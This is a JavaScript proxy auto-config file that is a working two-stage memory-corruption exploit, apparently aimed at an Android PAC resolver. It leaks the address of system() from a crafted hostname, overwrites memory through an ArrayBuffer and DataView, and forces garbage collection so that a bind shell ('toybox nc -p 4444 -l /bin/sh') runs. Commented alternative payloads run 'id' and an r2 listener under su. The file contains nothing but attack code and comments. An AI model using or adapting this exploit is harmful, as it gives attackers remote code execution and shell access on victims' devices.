//var command = "log \"exploit user: $(id)\"\n";
var command = "toybox nc -p 4444 -l /bin/sh"; // shell listens on port 4444
//var command "su -c /data/data/com.termux/files/usr/bin/r2 rap://:4444"; // r2 listens on port 4444

function FindProxyForURL(url, host){
    alert(url);
    alert(host);

    // split into stages makes exploit easier / more reliable though it is not strictly necessary
    if(host.includes("stage1")){
        var system_addr = parseInt(host.split("-")[1], 16); // get system() addr from hostname
        this.x = new ArrayBuffer(system_addr); // set it as size to be used in blr x2 instruction later
        this.v = new DataView(this.x); // dataview of buffer lets us write mem into [x0]
    }
    else if(host.includes("stage2")){
        strToBuf(command, this.v); // write command into the memory of previous url

        this.x = null; // remove refs 
        this.v = null; // remove refs 

        gc(); // trigger garbage collection to call overwritten free()
    }

    alert("done");
    return "DIRECT";
}

function strToBuf(str, buf)
{
    for(i=0; i<str.length; i++)
    {
        buf.setUint8(i, str.charCodeAt(i));
    }
    buf.setUint8(i+1, 0);
}

function gc()
{
    for(i=0; i<1000; i++)
    {
        new Array(0x1000);
    }
}